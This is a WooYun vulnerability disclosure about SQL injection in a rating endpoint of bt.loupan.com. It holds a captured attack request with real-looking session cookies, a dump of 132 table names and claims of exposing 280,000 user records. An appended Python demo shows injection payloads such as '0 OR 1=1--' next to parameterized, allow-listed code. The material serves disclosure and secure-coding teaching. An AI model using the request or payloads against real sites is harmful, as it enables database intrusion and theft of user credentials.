
Vulnerability summary

Defect ID: wooyun-2015-0144242

Title: SQL injection on a loupan.com site (affects 290,000 user records)

Vendor: loupan.com

Author: 路人甲

Submitted: 2015-09-30 15:34

Fix deadline: 2015-10-13 09:00

Published: 2015-10-13 09:00

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor notified, but the vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-09-30: details sent to the vendor, awaiting vendor handling
2015-10-13: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

POST /index.php/house/ajax_set_score/?s=0.44206551369279623 HTTP/1.1
Content-Length: 83
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://bt.loupan.com/
Cookie: loupan_user_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fd2fb6b449ad85c36aac0ffde041b6c0%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22113.140.254.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1443537248%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A9%3A%22post_flag%22%3Bi%3A55871%3B%7Db81c461652f37f06c78eef9a138cae35; nom=0; loadDomain=http%3A%2F%2Fbt.loupan.com%2F; search_keyword_site_id=735; PHPSESSID=hen5d5v7iat9c8akdnmgpt1eb0; Hm_lvt_c07a5cf91cdac070faa1e701f45995a8=1443538731,1443539101,1443539345; Hm_lpvt_c07a5cf91cdac070faa1e701f45995a8=1443539345; CNZZDATA30080590=cnzz_eid%3D1915813855-1443534182-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1443534182; CNZZDATA30035949=cnzz_eid%3D1429213213-1443533965-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1443533965; HMACCOUNT=EFD7A3C5C6C0D64F; BAIDUID=864EE9BE8826851DB4873E062367ECE5:FG=1; bdshare_firstime=1443539478238
Host: bt.loupan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
house_id=2830004&score=20&type=jiaotong

[Screenshot: 11.png]

132 tables:

[Screenshot: 22.png]

Database: loupan2013
[132 tables]
+------------------------------------+
| coreseek_counter |
| lp_admin |
| lp_admin_log |
| lp_admin_permissions |
| lp_admin_roles |
| lp_admin_roles_permissions |
| lp_admin_sites |
| lp_ads |
| lp_ads_pages |
| lp_ads_positions |
| lp_ads_sites |
| lp_attachments |
| lp_broker |
| lp_changelog |
| lp_ci_sessions |
| lp_cities |
| lp_cities_price |
| lp_consultant |
| lp_contact_info |
| lp_customer_purchase_intention |
| lp_dissertation |
| lp_dissertation_model |
| lp_email_bind |
| lp_email_get_password |
| lp_email_validate |
| lp_fangdai_bbs |
| lp_feedback |
| lp_fenxiao_balance |
| lp_fenxiao_balance_application |
| lp_fenxiao_balance_history |
| lp_fenxiao_clients |
| lp_fenxiao_clients_disengagement |
| lp_fenxiao_history |
| lp_fenxiao_new_broker |
| lp_fenxiao_referrals |
| lp_fenxiao_referrals_history |
| lp_fenxiao_site_msg |
| lp_fenxiao_user_collect |
| lp_fenxiao_view |
| lp_fenxiao_xieyi |
| lp_forum |
| lp_friend_categories |
| lp_friend_link_application |
| lp_friend_link_investigation_cycle |
| lp_friend_link_investigation_error |
| lp_friend_links |
| lp_frontend_pages |
| lp_frontend_pages_extra |
| lp_group_buy |
| lp_group_buy_forms |
| lp_hlink_in_news |
| lp_house_correction |
| lp_houses |
| lp_houses_attributes |
| lp_houses_click_cache |
| lp_houses_comment |
| lp_houses_editor_comment |
| lp_houses_fenxiao |
| lp_houses_info |
| lp_houses_parameters |
| lp_houses_pic_draw |
| lp_houses_pic_effect |
| lp_houses_pic_focus |
| lp_houses_pic_mating |
| lp_houses_pic_model |
| lp_houses_pic_real |
| lp_houses_pic_traffic |
| lp_houses_price_history |
| lp_houses_prices |
| lp_houses_score |
| lp_houses_special |
| lp_houses_telephone_set |
| lp_houses_thumb_cache |
| lp_houses_trend |
| lp_hpyold2new |
| lp_information_gathering |
| lp_loan |
| lp_lottery |
| lp_lottery_type |
| lp_loupandai_msg |
| lp_loupandai_token |
| lp_merchants |
| lp_message |
| lp_news |
| lp_news_backup |
| lp_news_categories |
| lp_news_info |
| lp_news_keywords |
| lp_news_position |
| lp_news_position_relation |
| lp_notice |
| lp_notice_new |
| lp_notice_new_record |
| lp_sites |
| lp_sms |
| lp_sms_queue |
| lp_special_keywords |
| lp_special_keywords_comments |
| lp_special_keywords_old |
| lp_special_keywords_old_related |
| lp_store |
| lp_syn_phone_config |
| lp_telephone_balance |
| lp_telephone_cost |
| lp_telephone_cost_bak |
| lp_telephone_cost_bak201569 |
| lp_telephone_history |
| lp_telephone_queue |
| lp_telephone_recharge_history |
| lp_telephone_set_pool |
| lp_toupiao |
| lp_user_atuo_refresh_templet |
| lp_user_balance |
| lp_user_balance_history |
| lp_user_collect |
| lp_user_combo |
| lp_user_operation_auto_refresh |
| lp_user_operation_promotion |
| lp_user_operation_refresh |
| lp_user_operation_top |
| lp_users |
| lp_users_accepter |
| lp_users_link_accepter |
| lp_users_link_provider |
| lp_users_provider |
| lp_weixin |
| lp_weixin_member |
| lp_weixin_member_pio |
| lp_weixin_message |
| lp_xfbiaoqian |
| lp_youhui_class |
| lp_youhui_list |
+------------------------------------+

280,000 user records:

[Screenshot: 13.png]

Includes usernames, passwords, mobile numbers and other fields:

[Screenshot: 14.png]

[Screenshot: 19.png]

Proof of vulnerability:

Suggested fix:
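The report leaves the fix section empty and shows no server-side code, nor does it say which of the three form fields (house_id, score, type) is the injectable one. The following is an added example, not code from the report or from loupan.com: it reproduces the pattern that makes an endpoint like ajax_set_score injectable (form values concatenated into an UPDATE) beside the parameterized, allow-listed form, in Python with SQLite standing in for the MySQL database. house_id=2830004 and type=jiaotong come from the captured request; the column names, sample rows, the "huanjing" type, the score range and the allow-list contents are assumptions for the demonstration.

```python
import re
import sqlite3

# Constructed stand-ins for two tables named in the report's table list
# (lp_houses_score, lp_users). Columns and rows are assumptions for the demo.
SCORE_ROWS = [
    (2830004, "jiaotong", 15),   # house_id and type taken from the captured request
    (2830004, "huanjing", 12),   # "huanjing" is a hypothetical second score type
    (2830005, "jiaotong", 18),
]
# Constructed user row: an MD5-style hash and a mobile number, since the report
# says the real lp_users table exposes username, password and phone fields.
USER_ROWS = [(1, "alice", "5f4dcc3b5aa765d61d8327deb882cf99", "13800000000")]

HOUSE_ID_RE = re.compile(r"[1-9][0-9]{0,9}")   # positive integer, at most 10 digits
SCORE_RE = re.compile(r"[0-9]{1,3}")
ALLOWED_TYPES = {"jiaotong"}   # only the type visible in the report; extend per app
SCORE_MIN, SCORE_MAX = 0, 100  # assumed valid range for a score


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE lp_houses_score (house_id INTEGER, type TEXT, score INTEGER)")
    conn.executemany("INSERT INTO lp_houses_score VALUES (?, ?, ?)", SCORE_ROWS)
    conn.execute("CREATE TABLE lp_users (id INTEGER, username TEXT, password TEXT, mobile TEXT)")
    conn.executemany("INSERT INTO lp_users VALUES (?, ?, ?, ?)", USER_ROWS)
    conn.commit()
    return conn


def read_scores(conn, house_id):
    """Return {type: score} for one house; used to observe what the writes did."""
    rows = conn.execute(
        "SELECT type, score FROM lp_houses_score WHERE house_id = ?", (house_id,)
    ).fetchall()
    return dict(rows)


def set_score_vulnerable(conn, house_id, score, type_):
    """The injectable pattern: raw form fields pasted into the SQL text.

    A house_id of "0 OR 1=1--" comments out the rest of the WHERE clause and
    rewrites every row; a score of "(SELECT password FROM lp_users LIMIT 1)"
    copies a password hash into a column that a normal page later renders.
    Returns the number of rows changed.
    """
    sql = (f"UPDATE lp_houses_score SET score = {score} "
           f"WHERE house_id = {house_id} AND type = '{type_}'")
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def set_score_safe(conn, house_id, score, type_):
    """Hardened form: values are bound as parameters and never become SQL text."""
    cur = conn.execute(
        "UPDATE lp_houses_score SET score = ? WHERE house_id = ? AND type = ?",
        (score, house_id, type_),
    )
    conn.commit()
    return cur.rowcount


def validate_request(form):
    """Allow-list the three form fields; return (house_id, score, type) or None."""
    house_id = form.get("house_id", "")
    score = form.get("score", "")
    type_ = form.get("type", "")
    if not HOUSE_ID_RE.fullmatch(house_id) or not SCORE_RE.fullmatch(score):
        return None
    score_val = int(score)
    if not SCORE_MIN <= score_val <= SCORE_MAX or type_ not in ALLOWED_TYPES:
        return None
    return int(house_id), score_val, type_


def handle_set_score(conn, form):
    """Endpoint logic with both defences: validate first, then bind parameters."""
    parsed = validate_request(form)
    if parsed is None:
        return {"ok": False, "changed": 0}
    house_id, score, type_ = parsed
    return {"ok": True, "changed": set_score_safe(conn, house_id, score, type_)}


if __name__ == "__main__":
    db = make_db()
    print("before:", read_scores(db, 2830004))
    print("rows hit by house_id=\"0 OR 1=1--\":",
          set_score_vulnerable(db, "0 OR 1=1--", "99", "jiaotong"))
    db = make_db()
    set_score_vulnerable(db, "2830004", "(SELECT password FROM lp_users LIMIT 1)", "jiaotong")
    print("score column now holds:", read_scores(db, 2830004)["jiaotong"])
    db = make_db()
    print("safe handler on the same payload:",
          handle_set_score(db, {"house_id": "0 OR 1=1--", "score": "99", "type": "jiaotong"}))
```

The two defences are deliberately layered: parameter binding alone already stops the payloads from being parsed as SQL, but the allow-list on type and the numeric checks on house_id and score also keep junk like a subquery string from being stored as the literal score value, and they give the application a clean place to log and reject probes such as the one in the captured request.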

Copyright notice: when reposting, credit the source as 路人甲@乌云


Vulnerability response

Vendor response:

Severity: no impact; vendor ignored

Ignored at: 2015-10-13 09:00

Vendor reply:

Rank: 4 (WooYun assessment)

Latest status:

None

